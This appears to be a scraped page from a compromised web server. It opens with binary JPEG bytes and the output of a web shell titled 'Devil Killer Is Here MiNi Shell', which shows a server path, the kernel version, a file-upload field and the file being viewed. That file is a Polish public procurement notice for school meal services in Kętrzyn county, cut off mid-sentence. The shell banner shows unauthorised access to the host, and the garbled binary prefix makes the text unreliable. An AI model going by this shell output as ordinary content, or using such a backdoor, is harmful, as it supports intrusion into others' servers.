JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240305/0023162401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługa przygotowania, dostarczania i podawania posiłków - na bieżące potrzeby jednostek organizacyjnych Powiatu Kętrzyńskiego” <br/>(na rzecz ZS im. M. Rataja w Reszlu, PCE w Kętrzynie i PDD w Kętrzynie) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH POWIATU KĘTRZYŃSKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 362053243</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pocztowa 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kętrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">izabela.dados@starostwo.ketrzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cuw.starostwo.ketrzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługa przygotowania, dostarczania i podawania posiłków - na bieżące potrzeby jednostek organizacyjnych Powiatu Kętrzyńskiego” <br/>(na rzecz ZS im. M. Rataja w Reszlu, PCE w Kętrzynie i PDD w Kętrzynie) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-163e13d3-ca52-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00231624</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00054730/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa przygotowania, dostarczania i podawania gotowych posiłków, na rzecz jednostek organizacyjnych Powiatu Kętrzyńskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/887453 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Składanie wniosków o wyjaśnienie SWZ, oferty wraz z wymaganymi dokumentami oraz inna komunikacja pomiędzy Wykonawcą a Zamawiającym odbywa się za pośrednictwem platformy dostępnej pod adresem:<br/>https://platformazakupowa.pl/transakcja/887453</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5. Zamawiający, zgodnie z rozporządzeniem w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	Szyfrowanie na Platformie Zakupowej odbywa się za pomocą protokołu TLS 1.3.<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm: ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)	akceptuje warunki korzystania z Platformy Zakupowej określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy Zakupowej, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Pzp.<br/>8. Zamawiający informuje, że instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy Zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>9. W związku z tym, że formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z rozporządzeniem w sprawie Krajowych Ram Interoperacyjności...:<br/>1)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>2)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip .7Z<br/>3)	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max. 10 MB (łącznie z podpisem) oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max. 5 MB (łącznie z podpisem).<br/>5)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>6)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>7)	7)	Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów...<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. X SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">3. Zgodnie z art. 13 ust. 1-2 RODO, informuję, że: <br/>1) administratorem udostępnionych w niniejszym postępowaniu danych osobowych jest Dyrektor Centrum Usług Wspólnych Powiatu Kętrzyńskiego z siedzibą przy Placu Grunwaldzkim 1 w Kętrzynie (11-400) - kontakt z Inspektor Ochrony Danych: iod-cuw@starostwo-ketrzyn.pl lub na wyżej podany adres Administratora danych (z dopiskiem „Inspektor ochrony danych osobowych”);<br/>2) udostępnione w niniejszym postępowaniu:<br/>a)	dane osobowe przekazywane przez Wykonawcę i uzyskane w trakcie postępowania o udzielenie zamówienia publicznego, a w szczególności: dane osobowe ujawnione w ofertach i dokumentach i oświadczeniach dołączonych do oferty oraz dane osobowe ujawnione w dokumentach i oświadczeniach składanych na podstawie art. 274 Pzp ;<br/>b)	dane przedsiębiorców ujawniane w Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), które stanowią dane osobowe w rozumieniu RODO,<br/>- przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego w sposób zautomatyzowany i nie będą podlegać profilowaniu.<br/>3) odbiorcami udostępnionych w niniejszym postępowaniu danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp; dane osobowe mogą zostać przekazane organom władzy publicznej oraz podmiotom wykonującym zadania publiczne lub działającym na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa, a także innym podmiotom, które na podstawie stosownych umów podpisanych ze stroną wskazaną w ust. 2 pkt 1 lit b) przetwarzają dane osobowe, dla których Administratorem osoba wskazana w ust. 2 pkt 1 lit b); odbiorcami danych osobowych mogą być również podmioty współpracujące z Administratorem w wykonywaniu celów określonych w niniejszej klauzuli, w szczególności inne instytucje publiczne, takie jak: sądy, prokuratura, policja, itp.; <br/>4) dane osobowe będą przetwarzane przez okres prowadzenia postępowania o udzielenie zamówienia publicznego oraz realizacji umowy, a następnie będą przechowywane począwszy od dnia zakończenia okresu obowiązywania umowy przez okres co najmniej 4 lata (nie krócej jednak, niż okres przedawnienia roszczeń); dane osobowe po zrealizowaniu celu pierwotnego, dla którego zostały zebrane, o jakim była mowa wcześniej, będą przetwarzane dla celów archiwalnych przez okres zgodny z obowiązującymi u Zamawiającego przepisami archiwalnymi oraz przez okres niezbędny dla obrony przed roszczeniami kierowanymi wobec Zamawiającego, na podstawie powszechnie obowiązujących przepisów prawa, z uwzględnieniem okresów przedawnienia roszczeń określonych w powszechnie obowiązujących przepisach prawa;<br/>5) obowiązek podania danych osobowych bezpośrednio Wykonawcy lub/i osób wskazanych do realizacji zamówienia jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego ; konsekwencje niepodania określonych danych osobowych wynikają z ustawy Pzp;<br/>6) w odniesieniu do udostępnionych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) udostępniający posiada prawo do:<br/>a)	art. 15 RODO - dostępu do danych osobowych jego dotyczących;<br/>b)	art. 16 RODO - sprostowania jego danych osobowych ;<br/>c)	art. 18 RODO - żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>d)	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jego dotyczących narusza przepisy RODO;<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) udostępniającemu nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.PK.343.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia to świadczenie usług, niezależnie dla każdej z jednostek organizacyjnych Powiatu Kętrzyńskiego, w okresie od 02.09.2024r. do 31.08.2025r., polegających na przygotowaniu, dostarczeniu oraz wydaniu posiłków uczniom i podopiecznym korzystającym z żywienia:<br/>1) ZADANIE I - przygotowanie oraz wydanie posiłków w Zespole Szkół im. Macieja Rataja w Reszlu, od poniedziałku do piątku, z wyłączeniem przerw wakacyjnych i świątecznych oraz dni ustawowo wolnych od nauki tj. szacunkowo:<br/>- ok. 184 dni żywieniowe w okresie od 02.09.2024r. do 30.06.2025r., czyli szacunkowo: 17.480 śniadań, 17.480 obiadów, 14.535 kolacji, RAZEM: 49.495 posiłków.<br/>…<br/>2. Wykonawcy … dostarczają oraz wydają posiłki korzystając z opakowań i naczyń będących w dyspozycji Wykonawcy.<br/>3. Wykonawcy zobowiązani będą do zagospodarowania odpadów pokonsumpcyjnych oraz ich utylizacji zgodnie z obowiązującymi przepisami, do zmywania oraz wyparzenia naczyń, sztućców, termosów itp. <br/>4. Wykonawca celem realizacji zamówienia zobowiązany jest do zorganizowania we własnym zakresie i na własny koszt oraz zgodnie z obowiązującymi przepisami: kuchni (z zastrzeżeniem opisanym w pkt 5), niezbędnych środków transportu, urządzeń, narzędzi i wyposażenia oraz zorganizowania i trzymania punktów przyjęcia oraz wydawania posiłków u poszczególnych Odbiorców usług.<br/>5. Wymogi dotyczące organizacji kuchni do realizacji przedmiotu zamówienia:<br/>1) w ZADANIU I posiłki BEZWZGLĘDNIE mają być przygotowywane w kuchni znajdującej się w obiektach Odbiorcy w usług wskazanych w ust. 1 pkt 1; <br/>UWAGA: zaznacza się, że dzierżawa pomieszczeń nie jest przedmiotem niniejszego postępowania; <br/>..<br/>- niniejsze żądania wynikają z charakteru usługi i konieczności przygotowania, dostarczenia i wydania posiłków świeżych, o określonej temperaturze, w należytym standardzie i o wymaganej jakości celem spełnienia warunków art. 17 ust. 1 i art. 204 ust. 1 Pzp. (doświadczenie wykazywane przez Wykonawcę w związku z warunkami udziału w postępowaniu określonymi w rozdz. XIX może wynikać z wykorzystywania kuchni w innej lokalizacji niż ta organizowana na potrzeby przedmiotowego zamówienia). <br/>6. Przedmiot zamówienia zawarty jest w opisie przedmiotu zamówienia stanowiącym odpowiednio zał. nr 10a do SWZ , informacja o pomieszczeniach podlegających dzierżawie w zał. nr 11 do SWZ a warunki realizacji zamówienia zostały opisane w projektach umów, stanowiących odpowiednio zał. nr 9a do SWZ.<br/>…..<br/>8. Szczegółowe informacje w szczególności dotyczące rozliczenia zamówienia zawierają projekty umów, stanowiące odpowiednio zał. nr 9a.<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. VI SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55523100-3 - Usługi w zakresie posiłków szkolnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewidują w każdej z zawieranych umów stosowanie prawa opcji - zamówienie gwarantowane to 70% wskazanego zapotrzebowania ilościowego na posiłki a opcją jest 30% wskazanego zapotrzebowania ilościowego na posiłki, z której Zamawiający skorzysta, jeśli jego działalność podstawowa będzie wymagała dalszego korzystania z oferowanych przez Wykonawcę usług.<br/>Szczegółowe informacje w szczególności dotyczące wykonania prawa opcji zawierają projekcie umowy stanowiącym zał. nr 9a do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) CENA OFERTY - Ocena będzie ustalana na podstawie ceny brutto zamówienia podstawowego, podanej przez Wykonawcę na formularzu oferty. W przypadku kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania: C= (Cmin*100 pkt/Co) x W, <br/>gdzie: C – ocena w kryterium „cena oferty”, Cmin - „cena oferty”<br/>C - ocena jaką otrzyma oferta badania za kryterium &#34;Cena&#34;<br/>C min – cena brutto oferty najtańszej<br/>C o – cena brutto oferty ocenianej<br/>W – waga kryterium wyrażona w częściach dziesiętnych (60%=0,6)<br/>2) TERMIN PŁATNOŚCI FAKTURY – Termin wskazany przez Wykonawcę w druku oferty, nie może być krótszy niż wskazany przez Zamawiającego tj. min. 7 dni. Jeżeli Wykonawca zaproponuje najdłuższy termin płatności faktury tj. 30 dni – oferta w tym zakresie zostanie uznana za najkorzystniejszą i uzyska – 100 pkt. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>za zaoferowanie 7 dni - 0,00 pkt x Waga (40%) = ocena 0,00 pkt, za zaoferowanie 14 dni - 30,00 pkt x Waga (40%) = ocena 12,00 pkt, za zaoferowanie 21 dni - 60,00 pkt x Waga (40%) = ocena 24,00 pkt za zaoferowanie 30 dni - 100,00 pkt x Waga (40%) = ocena 40,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia to świadczenie usług, niezależnie dla każdej z jednostek organizacyjnych Powiatu Kętrzyńskiego, w okresie od 02.09.2024r. do 31.08.2025r., polegających na przygotowaniu, dostarczeniu oraz wydaniu posiłków uczniom i podopiecznym korzystającym z żywienia:<br/>…<br/>2) ZADANIE II - dostarczenie oraz wydanie posiłków w Powiatowym Centrum Edukacyjnym w Kętrzynie, od poniedziałku do piątku, z wyłączeniem przerw wakacyjnych i świątecznych oraz dni ustawowo wolnych od nauki tj. szacunkowo:<br/>- ok. 184 dni żywieniowe w okresie od 02.09.2024r. do 30.06.2025r., czyli szacunkowo: 15.640 śniadań, 15.640 obiadów, 15.640 kolacji, RAZEM: 46,920 posiłków,<br/>…<br/>2. Wykonawcy … dostarczają oraz wydają posiłki korzystając z opakowań i naczyń będących w dyspozycji Wykonawcy.<br/>3. Wykonawcy zobowiązani będą do zagospodarowania odpadów pokonsumpcyjnych oraz ich utylizacji zgodnie z obowiązującymi przepisami, do zmywania oraz wyparzenia naczyń, sztućców, termosów itp. <br/>4. Wykonawca celem realizacji zamówienia zobowiązany jest do zorganizowania we własnym zakresie i na własny koszt oraz zgodnie z obowiązującymi przepisami: kuchni (z zastrzeżeniem opisanym w pkt 5), niezbędnych środków transportu, urządzeń, narzędzi i wyposażenia oraz zorganizowania i trzymania punktów przyjęcia oraz wydawania posiłków u poszczególnych Odbiorców usług.<br/>5. Wymogi dotyczące organizacji kuchni do realizacji przedmiotu zamówienia:<br/>..<br/>2) w ZADANIU II kuchnia powinna być zorganizowana w odległości nie dalszej niż 25 km od siedziby Odbiorcy usług przy ul. Poznańskiej 21 w Kętrzynie (liczonej po istniejących utwardzonych drogach publicznych); <br/>UWAGA: zaproponowanie kuchni w odległości dalszej niż w/w spowoduje odrzucenie oferty jako niezgodnej z warunkami 